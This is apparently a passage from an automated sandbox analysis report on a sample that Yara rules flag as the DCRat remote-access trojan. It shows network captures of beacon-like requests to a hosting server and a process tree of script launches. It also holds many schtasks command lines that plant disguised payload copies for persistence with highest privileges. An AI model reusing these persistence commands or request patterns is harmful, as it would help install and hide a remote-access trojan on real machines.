2024-10-30 17:27:12 UTC	16104	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 bf d1 80 d0 b8 d0 bf d0 b0 d1 80 d0 ba d0 be d0 b2 d0 b0 d0 bd 20 d0 b2 20 54 69 6d 65 77 65 62 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> Timeweb</title> <link href="https://fonts.googleapis.com/css2
2024-10-30 17:27:12 UTC	16384	IN	Data Raw: 62 6f 78 5f 5f 74 69 74 6c 65 22 3e d0 a0 d0 b0 d0 b7 d0 bc d0 b5 d1 81 d1 82 d0 b8 d1 82 d0 b5 20 d1 81 d0 b2 d0 be d0 b9 20 d1 81 d0 b0 d0 b9 d1 82 20 d0 b2 20 54 69 6d 65 77 65 62 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 75 6d 6d 79 2d 62 6f 78 5f 5f 64 65 73 63 20 64 75 6d 6d 79 2d 62 6f 78 5f 5f 64 65 73 63 2d 2d 6c 69 6d 69 74 22 3e 54 69 6d 65 77 65 62 20 2d 20 d0 ba d0 be d0 bc d0 bf d0 b0 d0 bd d0 b8 d1 8f 2c 20 d0 ba d0 be d1 82 d0 be d1 80 d0 b0 d1 8f 20 d1 80 d0 b0 d0 b7 d0 bc d0 b5 d1 89 d0 b0 d0 b5 d1 82 20 d0 bf d1 80 d0 be d0 b5 d0 ba d1 82 d1 8b 20 d0 ba d0 bb d0 b8 d0 b5 d0 bd d1 82 d0 be d0 b2 20 d0 b2 20 d0 98 d0 bd d1 82 d0 b5 d1 80 d0 bd d0 b5 d1 Data Ascii: box__title"> Timeweb</h2> <div class="dummy-box__desc dummy-box__desc--limit">Timeweb - ,
2024-10-30 17:27:12 UTC	16384	IN	Data Raw: 35 20 33 2e 38 39 32 36 43 31 30 2e 35 32 37 39 20 33 2e 39 35 35 39 20 31 31 2e 31 32 34 38 20 34 2e 30 38 32 34 39 20 31 31 2e 37 32 31 36 20 34 2e 33 33 35 36 36 43 31 32 2e 39 31 35 34 20 34 2e 39 30 35 33 31 20 31 33 2e 35 37 38 35 20 35 2e 38 35 34 37 33 20 31 33 2e 37 37 37 35 20 37 2e 31 32 30 36 31 43 31 33 2e 37 37 37 35 20 37 2e 31 38 33 39 31 20 31 33 2e 37 37 37 35 20 37 2e 32 34 37 32 20 31 33 2e 37 37 37 35 20 37 2e 33 31 30 35 43 31 33 2e 37 37 37 35 20 37 2e 34 33 37 30 39 20 31 33 2e 37 37 37 35 20 37 2e 35 36 33 36 37 20 31 33 2e 37 37 37 35 20 37 2e 37 35 33 35 36 43 31 33 2e 37 37 37 35 20 37 2e 38 31 36 38 35 20 31 33 2e 37 37 37 35 20 37 2e 38 38 30 31 35 20 31 33 2e 37 37 37 35 20 37 2e 39 34 33 34 34 43 31 33 2e 37 31 31 32 20 38 Data Ascii: 5 3.8926C10.5279 3.9559 11.1248 4.08249 11.7216 4.33566C12.9154 4.90531 13.5785 5.85473 13.7775 7.12061C13.7775 7.18391 13.7775 7.2472 13.7775 7.3105C13.7775 7.43709 13.7775 7.56367 13.7775 7.75356C13.7775 7.81685 13.7775 7.88015 13.7775 7.94344C13.7112 8
2024-10-30 17:27:12 UTC	16384	IN	Data Raw: 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 30 2e 35 32 38 37 35 38 20 30 2e 31 39 35 32 36 32 43 30 2e 32 36 38 34 30 39 20 30 2e 34 35 35 36 31 32 20 30 2e 32 36 38 34 30 39 20 30 2e 38 37 37 37 32 32 20 30 2e 35 32 38 37 35 38 20 31 2e 31 33 38 30 37 4c 33 2e 33 39 30 36 39 20 34 4c 30 2e 35 32 38 37 35 39 20 36 2e 38 36 31 39 33 43 30 2e 32 36 38 34 30 39 20 37 2e 31 32 32 32 38 20 30 2e 32 36 38 34 30 39 20 37 2e 35 34 34 33 39 20 30 2e 35 32 38 37 35 39 20 37 2e 38 30 34 37 34 43 30 2e 37 38 39 31 30 38 20 38 2e 30 36 35 30 39 20 31 2e 32 31 31 32 32 20 38 2e 30 36 35 30 39 20 31 2e 34 37 31 35 37 20 37 2e 38 30 34 37 34 4c 34 2e 36 36 33 34 38 20 34 2e 36 31 32 38 33 43 35 2e 30 30 31 39 33 Data Ascii: "evenodd" clip-rule="evenodd" d="M0.528758 0.195262C0.268409 0.455612 0.268409 0.877722 0.528758 1.13807L3.39069 4L0.528759 6.86193C0.268409 7.12228 0.268409 7.54439 0.528759 7.80474C0.789108 8.06509 1.21122 8.06509 1.47157 7.80474L4.66348 4.61283C5.00193
2024-10-30 17:27:12 UTC	11877	IN	Data Raw: 36 38 34 30 39 20 37 2e 35 34 34 33 39 20 30 2e 35 32 38 37 35 39 20 37 2e 38 30 34 37 34 43 30 2e 37 38 39 31 30 38 20 38 2e 30 36 35 30 39 20 31 2e 32 31 31 32 32 20 38 2e 30 36 35 30 39 20 31 2e 34 37 31 35 37 20 37 2e 38 30 34 37 34 4c 34 2e 36 36 33 34 38 20 34 2e 36 31 32 38 33 43 35 2e 30 30 31 39 33 20 34 2e 32 37 34 33 37 20 35 2e 30 30 31 39 33 20 33 2e 37 32 35 36 33 20 34 2e 36 36 33 34 38 20 33 2e 33 38 37 31 37 4c 31 2e 34 37 31 35 37 20 30 2e 31 39 35 32 36 32 43 31 2e 32 31 31 32 32 20 2d 30 2e 30 36 35 30 38 37 34 20 30 2e 37 38 39 31 30 38 20 2d 30 2e 30 36 35 30 38 37 34 20 30 2e 35 32 38 37 35 38 20 30 2e 31 39 35 32 36 32 5a 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 68409 7.54439 0.528759 7.80474C0.789108 8.06509 1.21122 8.06509 1.47157 7.80474L4.66348 4.61283C5.00193 4.27437 5.00193 3.72563 4.66348 3.38717L1.47157 0.195262C1.21122 -0.0650874 0.789108 -0.0650874 0.528758 0.195262Z"></path>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49713	185.114.245.123	443	5968	C:\Program Files\7-Zip\Lang\Memory Compression.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 17:27:14 UTC	590	OUT	GET /parking/?ref=cy08450.tw1.ru&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn&3e48e0b3851c0a441c70744047c3bbd6=2dfc2c4d65174f7765d320b12c48ed88&a552bb1baa0205e417bc3d750c585e5e=QZ3EzN1QWYlVDOzMTYxUTNkNzMjRzYxYjNzYTM5cTNiZWNxEWOmVmY&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: vh438.timeweb.ru
2024-10-30 17:27:15 UTC	280	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Wed, 30 Oct 2024 17:27:14 GMT Content-Type: text/html; charset=utf-8 Content-Length: 77133 Connection: close Vary: Accept-Encoding Last-Modified: Wed, 16 Apr 2014 07:06:24 GMT ETag: "12d4d-4f7238deedc00" Accept-Ranges: bytes
2024-10-30 17:27:15 UTC	16104	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 bf d1 80 d0 b8 d0 bf d0 b0 d1 80 d0 ba d0 be d0 b2 d0 b0 d0 bd 20 d0 b2 20 54 69 6d 65 77 65 62 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> Timeweb</title> <link href="https://fonts.googleapis.com/css2
2024-10-30 17:27:15 UTC	16384	IN	Data Raw: 62 6f 78 5f 5f 74 69 74 6c 65 22 3e d0 a0 d0 b0 d0 b7 d0 bc d0 b5 d1 81 d1 82 d0 b8 d1 82 d0 b5 20 d1 81 d0 b2 d0 be d0 b9 20 d1 81 d0 b0 d0 b9 d1 82 20 d0 b2 20 54 69 6d 65 77 65 62 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 75 6d 6d 79 2d 62 6f 78 5f 5f 64 65 73 63 20 64 75 6d 6d 79 2d 62 6f 78 5f 5f 64 65 73 63 2d 2d 6c 69 6d 69 74 22 3e 54 69 6d 65 77 65 62 20 2d 20 d0 ba d0 be d0 bc d0 bf d0 b0 d0 bd d0 b8 d1 8f 2c 20 d0 ba d0 be d1 82 d0 be d1 80 d0 b0 d1 8f 20 d1 80 d0 b0 d0 b7 d0 bc d0 b5 d1 89 d0 b0 d0 b5 d1 82 20 d0 bf d1 80 d0 be d0 b5 d0 ba d1 82 d1 8b 20 d0 ba d0 bb d0 b8 d0 b5 d0 bd d1 82 d0 be d0 b2 20 d0 b2 20 d0 98 d0 bd d1 82 d0 b5 d1 80 d0 bd d0 b5 d1 Data Ascii: box__title"> Timeweb</h2> <div class="dummy-box__desc dummy-box__desc--limit">Timeweb - ,
2024-10-30 17:27:15 UTC	16384	IN	Data Raw: 35 20 33 2e 38 39 32 36 43 31 30 2e 35 32 37 39 20 33 2e 39 35 35 39 20 31 31 2e 31 32 34 38 20 34 2e 30 38 32 34 39 20 31 31 2e 37 32 31 36 20 34 2e 33 33 35 36 36 43 31 32 2e 39 31 35 34 20 34 2e 39 30 35 33 31 20 31 33 2e 35 37 38 35 20 35 2e 38 35 34 37 33 20 31 33 2e 37 37 37 35 20 37 2e 31 32 30 36 31 43 31 33 2e 37 37 37 35 20 37 2e 31 38 33 39 31 20 31 33 2e 37 37 37 35 20 37 2e 32 34 37 32 20 31 33 2e 37 37 37 35 20 37 2e 33 31 30 35 43 31 33 2e 37 37 37 35 20 37 2e 34 33 37 30 39 20 31 33 2e 37 37 37 35 20 37 2e 35 36 33 36 37 20 31 33 2e 37 37 37 35 20 37 2e 37 35 33 35 36 43 31 33 2e 37 37 37 35 20 37 2e 38 31 36 38 35 20 31 33 2e 37 37 37 35 20 37 2e 38 38 30 31 35 20 31 33 2e 37 37 37 35 20 37 2e 39 34 33 34 34 43 31 33 2e 37 31 31 32 20 38 Data Ascii: 5 3.8926C10.5279 3.9559 11.1248 4.08249 11.7216 4.33566C12.9154 4.90531 13.5785 5.85473 13.7775 7.12061C13.7775 7.18391 13.7775 7.2472 13.7775 7.3105C13.7775 7.43709 13.7775 7.56367 13.7775 7.75356C13.7775 7.81685 13.7775 7.88015 13.7775 7.94344C13.7112 8
2024-10-30 17:27:15 UTC	16384	IN	Data Raw: 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 30 2e 35 32 38 37 35 38 20 30 2e 31 39 35 32 36 32 43 30 2e 32 36 38 34 30 39 20 30 2e 34 35 35 36 31 32 20 30 2e 32 36 38 34 30 39 20 30 2e 38 37 37 37 32 32 20 30 2e 35 32 38 37 35 38 20 31 2e 31 33 38 30 37 4c 33 2e 33 39 30 36 39 20 34 4c 30 2e 35 32 38 37 35 39 20 36 2e 38 36 31 39 33 43 30 2e 32 36 38 34 30 39 20 37 2e 31 32 32 32 38 20 30 2e 32 36 38 34 30 39 20 37 2e 35 34 34 33 39 20 30 2e 35 32 38 37 35 39 20 37 2e 38 30 34 37 34 43 30 2e 37 38 39 31 30 38 20 38 2e 30 36 35 30 39 20 31 2e 32 31 31 32 32 20 38 2e 30 36 35 30 39 20 31 2e 34 37 31 35 37 20 37 2e 38 30 34 37 34 4c 34 2e 36 36 33 34 38 20 34 2e 36 31 32 38 33 43 35 2e 30 30 31 39 33 Data Ascii: "evenodd" clip-rule="evenodd" d="M0.528758 0.195262C0.268409 0.455612 0.268409 0.877722 0.528758 1.13807L3.39069 4L0.528759 6.86193C0.268409 7.12228 0.268409 7.54439 0.528759 7.80474C0.789108 8.06509 1.21122 8.06509 1.47157 7.80474L4.66348 4.61283C5.00193
2024-10-30 17:27:15 UTC	11877	IN	Data Raw: 36 38 34 30 39 20 37 2e 35 34 34 33 39 20 30 2e 35 32 38 37 35 39 20 37 2e 38 30 34 37 34 43 30 2e 37 38 39 31 30 38 20 38 2e 30 36 35 30 39 20 31 2e 32 31 31 32 32 20 38 2e 30 36 35 30 39 20 31 2e 34 37 31 35 37 20 37 2e 38 30 34 37 34 4c 34 2e 36 36 33 34 38 20 34 2e 36 31 32 38 33 43 35 2e 30 30 31 39 33 20 34 2e 32 37 34 33 37 20 35 2e 30 30 31 39 33 20 33 2e 37 32 35 36 33 20 34 2e 36 36 33 34 38 20 33 2e 33 38 37 31 37 4c 31 2e 34 37 31 35 37 20 30 2e 31 39 35 32 36 32 43 31 2e 32 31 31 32 32 20 2d 30 2e 30 36 35 30 38 37 34 20 30 2e 37 38 39 31 30 38 20 2d 30 2e 30 36 35 30 38 37 34 20 30 2e 35 32 38 37 35 38 20 30 2e 31 39 35 32 36 32 5a 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 68409 7.54439 0.528759 7.80474C0.789108 8.06509 1.21122 8.06509 1.47157 7.80474L4.66348 4.61283C5.00193 4.27437 5.00193 3.72563 4.66348 3.38717L1.47157 0.195262C1.21122 -0.0650874 0.789108 -0.0650874 0.528758 0.195262Z"></path>

Target ID:	0
Start time:	13:26:53
Start date:	30/10/2024
Path:	C:\Users\user\Desktop\CPYEzG7VGh.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CPYEzG7VGh.exe"
Imagebase:	0x370000
File size:	1'227'432 bytes
MD5 hash:	F7361ED3503F11A56E8CC53AD6C277B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:26:53
Start date:	30/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\surrogateserverreviewsession\pmMvwz3lY7qlA.vbe"
Imagebase:	0x880000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:27:00
Start date:	30/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\surrogateserverreviewsession\cAWYZg0ZdjD2dKs6hjKja7TASB4qz.bat" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:27:00
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:27:00
Start date:	30/10/2024
Path:	C:\surrogateserverreviewsession\Agentserver.exe
Wow64 process (32bit):	false
Commandline:	"C:\surrogateserverreviewsession\Agentserver.exe"
Imagebase:	0x380000
File size:	848'896 bytes
MD5 hash:	F1AAAC4C20DF683E3596C8A7CD3DA07E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2122617723.0000000002A94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2122617723.0000000002A79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2122617723.0000000002791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:27:01
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe'" /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:27:01
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:27:01
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:27:01
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\uXGucUKOPdf.exe'" /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:27:01
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\uXGucUKOPdf.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:27:01
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\uXGucUKOPdf.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:27:01
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Recovery\uXGucUKOPdf.exe'" /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Recovery\uXGucUKOPdf.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 8 /tr "'C:\Recovery\uXGucUKOPdf.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 8 /tr "'C:\surrogateserverreviewsession\dasHost.exe'" /f
Imagebase:	0x7ff6d64d0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\surrogateserverreviewsession\dasHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 9 /tr "'C:\surrogateserverreviewsession\dasHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 9 /tr "'C:\Windows\Offline Web Pages\uXGucUKOPdf.exe'" /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\uXGucUKOPdf.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Windows\Offline Web Pages\uXGucUKOPdf.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Windows\Containers\serviced\uXGucUKOPdf.exe'" /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\uXGucUKOPdf.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 6 /tr "'C:\Windows\Containers\serviced\uXGucUKOPdf.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\Memory Compression.exe'" /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
